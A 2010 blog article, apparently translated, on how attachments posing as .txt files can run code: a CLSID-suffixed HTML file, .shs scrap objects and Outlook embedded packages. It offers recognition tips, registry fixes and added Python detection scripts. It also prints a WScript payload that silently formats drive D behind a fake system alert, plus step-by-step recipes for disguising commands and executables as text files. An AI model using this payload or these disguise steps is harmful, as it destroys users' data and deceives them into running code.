Wednesday, December 15, 2010
[Weak Current College] TXT text files are dangerous too

If you receive an email attachment that looks like this: QQ broadcasting.txt, you might think it must be a plain text file. Not necessarily! Its actual file name can be QQ broadcasting.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}. In the registry, {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} is associated with HTML files. When the file is saved under this name, however, the suffix is not displayed and what you see is a .txt file; the file is actually equivalent to QQ broadcasting.txt.html. Why is it risky to open this file directly? Suppose the contents of the file are as follows:

    <script>
    a = new ActiveXObject("WScript.Shell");
    a.run("format.com d: /q /autotest /u");
    alert("Windows is configuring the system. Please do not interrupt this process.");
    </script>

You may think it will be opened in Notepad, but if you double-click it, it is run as HTML, automatically begins formatting drive D in the background, and displays a dialog box reading "Windows is configuring the system. Please do not interrupt this process." to deceive you. Is opening a .txt attachment dangerous enough for you?

How the spoof works: when you double-click the disguised .txt file, its real extension is .{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}, that is, .html, so it is run as an HTML file. That is what allows it to execute.

Lines 2 and 3 of the file are what produce the damage. Line 3 carries out the destruction; it is where a destructive command is placed. And line 2? You may have noticed "WScript" on line 2. It directs the whole show; it is the mastermind behind the scenes!

WScript's full name is Windows Scripting Host. It is a feature newly added in Win98, a batch language and automation tool. Its corresponding program, "WScript.exe", is a script language interpreter located in C:\WINDOWS; it allows scripts to be executed the way batch files are. The Windows Scripting Host environment predefines a number of objects, and with its built-in objects you can access environment variables, create shortcuts, load programs, read and write the registry, and so on.

Recognition and prevention:

① The spoofed .txt file is not displayed with a text file icon; it shows the icon of an undefined file type. This is what distinguishes it from a normal TXT file.

② Another way to recognize it: when "My Computer" is set to "View as Web page", the full file name is shown on the left side when you select the file, and you can see that it is not a true TXT file. The problem is that many beginners lack experience, and veterans may open it through inattention. So once again: when you receive a message, look not only at the extension shown in the attachment's file name but also at the icon actually displayed.

③ For an attachment that appears to be a TXT file, download it, then right-click it and choose "Open with Notepad"; this is safe.

II. Malicious scrap files

Another dangerous kind of TXT file is what Windows calls a "scrap object" (extension "shs"). It is generally disguised as a text file and spread through email attachments, for example: QQ number broadcasting.txt.shs. The real suffix "shs" is not displayed, and if the file contains a command such as "format", the result will be terrible!
In addition, the following four points make it especially dangerous:

① The default icon of a scrap object file resembles the Notepad file icon, so it is easily mistaken for a text document and users are not sufficiently on guard against it.

② In Windows's default state, the scrap object extension (".shs") is hidden. Even if you go to "Explorer" → "Tools" → "Folder Options" → "View" and remove the "√" in front of "Hide extensions for known file types", ".shs" stays hidden. Because Windows supports double extensions, a file such as "QQ number broadcasting.txt.shs" will always be displayed as "QQ number broadcasting.txt".

③ Even if you are suspicious, scanning with anti-virus software will not flag the file, because the file itself is not a virus, nor is it an executable or a system file. Would you suspect such a file?

④ Such SHS attachment viruses are very easy to make: it takes 5 minutes to learn and requires no programming knowledge (everyone knows the command to format drive C: "format c:").

1. A concrete example

So what threat does a scrap object actually pose to a user's computer? A test will make it clear. The following tests were done on Windows 2000 Server. We first create a test file test.txt (I created it at D:\test.txt), and then make a scrap object file that deletes this test file.

① First run the Object Packager (packager.exe); on my Win2000 Server it is installed in /winnt/system32.

② Create a new file and open the menu "File" → "Import"; a file dialog box pops up for you to select a file. Just select any file.

③ Then open "Edit" → "Command Line", enter "cmd.exe /c del d:\test.txt" in the command line dialog box, and click OK.

④ Then choose "Edit" → "Copy Package" from the menu.

⑤ Next, pick any location on your hard disk; I used the desktop directly. Right-click on the desktop and choose "Paste" from the pop-up menu; a scrap object file is created on the desktop.

Now double-click this file: a CMD window flashes by, and if you then look at drive D, the test file D:\test.txt has been deleted! So now you know that the command entered in the Object Packager is executed. How dangerous: if the command deleted an important system file, or were a format command, how terrible that would be!

Let's take a look at the true face of this "invisible killer"!

2. Technical principle

According to Microsoft, an SHS file is a special kind of OLE (Object Linking and Embedding) object that can be created from a Word document or an Excel spreadsheet. By selecting some text or a region of an image in a document and dragging it somewhere on the desktop, you create a Windows scrap object, that is, an SHS file (this file is not human-readable). You can rename the SHS file to any other file name you like, or drag the SHS object into another document (equivalently, you can cut and paste).

In other words, the command we entered was embedded as an OLE object in the Object Packager's new file. To make it easy to copy objects embedded in files, Microsoft uses a technique called Shell Scrap Object (SHS): when you copy an object between different files, Windows wraps the object in a scrap object for the copy. Therefore, when we do not paste into a file but paste the scrap object directly onto the hard disk, an .shs file is created.
This scrap object file retains the features of the original object, so the command the original object contains will be parsed and executed. That is exactly what makes it so dangerous!

3. Preventive methods

(1) The "barbaric" method

Since an SHS file is not itself an executable, it needs another program to parse and run it; removing that association prevents the threat lurking in such files. Run the registry editor regedit.exe and, under the key HKEY_CLASSES_ROOT\.shs, delete the default value "ShellScrap". Now double-click an .shs file: see, it is no longer executed? A dialog box pops up asking which program should open the .shs file; choosing "Notepad" there is very safe. A more thorough approach is to delete HKEY_CLASSES_ROOT\ShellScrap\shell\open\command, which removes the .shs file association completely. Now when you double-click an .shs file, not even the program selection dialog appears; instead you are asked to rebuild the file association in Control Panel.

(2) The "civilized" method

① Under the HKEY_CLASSES_ROOT\ShellScrap key in the registry editor there is a value "NeverShowExt"; it is the reason the ".shs" extension is never displayed. Delete this value and the ".shs" extension becomes visible.

② Replace the default icon of "scrap object" files. Because the default scrap object icon is very similar to the text file icon and easily lulls people into carelessness, we should change it. Open Explorer, choose "Folder Options" under the "View" menu, and in the dialog box that pops up choose the "File Types" tab; find "Scrap object" under "Registered file types". Click the "Edit" button to open the "Edit File Type" dialog box, then click the "Change Icon" button at the top. Open C:\WINDOWS\SYSTEM\Pifmgr.dll and choose one of the icons that appear as the new icon for ".shs" files.
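
The audit below is an added example, not part of the original article: it reads a .reg export and lists every extension whose class carries the "NeverShowExt" value that the "civilized" method deletes, generalizing from ShellScrap to any registered class. The sample export is constructed, and the handler command in it is a placeholder.

```python
import re

# Constructed .reg export for illustration; the command value is a placeholder.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.shs]
@="ShellScrap"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\ShellScrap]
@="Scrap object"
"NeverShowExt"=""

[HKEY_CLASSES_ROOT\ShellScrap\shell\open\command]
@="<handler command placeholder>"
'''

KEY = re.compile(r'^\[HKEY_CLASSES_ROOT\\(.+)\]$')
VALUE = re.compile(r'^(@|"[^"]+")=(.*)$')

def parse_classes(reg_text):
    """Map each HKEY_CLASSES_ROOT subkey (lower-cased) to its values."""
    keys, current = {}, None
    for line in (l.strip() for l in reg_text.splitlines()):
        if line.startswith('['):
            m = KEY.match(line)
            current = keys.setdefault(m.group(1).lower(), {}) if m else None
        elif current is not None and (m := VALUE.match(line)):
            current[m.group(1).strip('"').lower()] = m.group(2).strip('"')
    return keys

def never_shown_extensions(reg_text):
    """Return (extension, class, has_open_command) for classes with NeverShowExt."""
    keys = parse_classes(reg_text)
    found = []
    for ext, values in keys.items():
        if not ext.startswith('.') or '\\' in ext:
            continue  # only top-level extension keys such as ".shs"
        cls = values.get('@', '')
        if 'nevershowext' in keys.get(cls.lower(), {}):
            opens = cls.lower() + r'\shell\open\command' in keys
            found.append((ext, cls, opens))
    return sorted(found)

if __name__ == '__main__':
    for ext, cls, opens in never_shown_extensions(SAMPLE_REG):
        print(f'{ext}: class {cls} hides its extension; open handler: {opens}')
```

An extension reported with an open handler is one that both stays hidden in Explorer and runs something on double-click, which is the combination the article warns about.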

(3) Additional preventive measures

① If a virus file hides its real extension "shs" and your anti-virus software is set to scan only specified program files rather than all files (for example, only executable files), the anti-virus software will not find the virus. Add ".shs" files to the file types the anti-virus software scans. The settings of the various anti-virus products are relatively simple, so set this up yourself.

② Prohibit "scrap object" files and "shortcut to document" files.

III. Disguised mail attachments

In addition to the two kinds of dangerous "TXT" files above, there is one more: the disguised mail attachment. It looks like a TXT file but is actually an EXE file! I will use Outlook 2000 Simplified Chinese edition as the example.

1. Open Outlook 2000 and create a new message. Choose "Format" → "Rich Text" from the menu bar, click in the message body, choose "Insert" → "Object", click "Create from File" → "Browse", select notepad.exe in the Windows directory, and click "OK". notepad.exe and its icon appear in the body of the new message.

2. Right-click the notepad.exe icon that has appeared and choose "Edit Package" to open the Object Packager. Click the "Insert Icon" button, choose "Browse", select WINDOWS\SYSTEM\SHELL32.DLL, pick the icon you want from the "Current icon" box, for example the text file icon, and press "OK". Then choose "Edit" → "Label" from the menu, give it any name, for example hello.txt, and click OK.

3. Exit the Object Packager and choose to update when prompted.

4. Now what appears in front of you is hello.txt. Most people will take it for a plain text file attachment; I believe no one would suspect it is something else.
Double-click the icon and see what happens: what opens is notepad.exe! If it were a virus file, you can imagine the consequences!

In fact, when Outlook 2000 receives such a message, it is shown as a message with an attachment. When you take it for a text file and double-click to open it, Outlook prompts: "Some objects contain viruses that may harm your computer, so make sure the object comes from a trusted source. Do you trust this embedded object?" People with a strong sense of security usually choose "No" (that's right); ordinary users may choose "Yes" (that's not good!).

Identification: don't be afraid. Although it is highly deceptive, it still gives itself away in a few places:

1. It is actually an OLE object, not an attachment. When you select it, the selection box differs from the one shown for attachments, and right-clicking it brings up a different menu.

2. When you double-click it, the security prompt differs from the one shown for attachments; this point is very important. At this point you should choose "No", then right-click and choose "Edit Package"; when asked whether you trust the object, choose "Yes", and look at the content box on the right side of the Object Packager. In this example it shows "Copy of NOTEPAD.EXE". Whether the file is an executable is the key here.

3. Because it is not an attachment, choosing "File" → "Save Attachments" brings up no dialog box.

4. Not all mail software supports embedded objects, so mail in this format is not necessarily recognized by some software, such as Outlook Express. However, given how widely Outlook is used, especially in larger organizations that have their own mail servers, it is still necessary to remind everyone to watch out for embedded objects. And it is not only Outlook: Word, Excel, and other software that supports embedded objects also allow an embedded object to be disguised to confuse people.
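
For the two file-name disguises covered earlier in this article (the CLSID suffix and the never-shown ".shs" extension), the following attachment-name check is an added example, not part of the original article. The finding labels, the decoy list and the sample names are assumptions constructed for illustration.

```python
import re

# CLSID the article gives as the registry association for HTML files.
HTML_CLSID = "3050F4D8-98B5-11CF-BB82-00AA00BDCE0B"
CLSID_TAIL = re.compile(
    r"\.\{([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}$")
NEVER_SHOWN = {".shs"}   # extension the article says Explorer keeps hidden
DECOYS = {".txt"}        # assumption: extensions a recipient reads as harmless

def split_ext(name):
    """Split 'a.txt.shs' into ('a.txt', '.shs'); the extension is lower-cased."""
    stem, dot, ext = name.rpartition(".")
    return (stem, "." + ext.lower()) if dot and stem else (name, "")

def screen_attachment(name):
    """Return sorted findings for one attachment file name ([] means clean)."""
    findings = set()
    full = name.strip().rstrip(". ")    # Windows drops trailing dots and spaces
    m = CLSID_TAIL.search(full)
    if m:
        findings.add("clsid-extension")
        if m.group(1).upper() == HTML_CLSID:
            findings.add("opens-as-html")
        visible, real_ext = full[:m.start()].rstrip(), "{clsid}"
    else:
        visible, real_ext = split_ext(full)
    if real_ext in NEVER_SHOWN:
        findings.add("never-shown-extension")
    # What the recipient sees once the real extension is hidden.
    if real_ext not in DECOYS and split_ext(visible)[1] in DECOYS:
        findings.add("decoy-extension")
    return sorted(findings)

# Constructed sample names modelled on the article's examples.
SAMPLES = [
    "QQ broadcasting.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}",
    "QQ number broadcasting.txt.shs",
    "notes.txt",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", screen_attachment(sample) or "no findings")
```

This looks only at names, so it does not cover the embedded OLE package of section III, where the label shown to the recipient is not a file name at all.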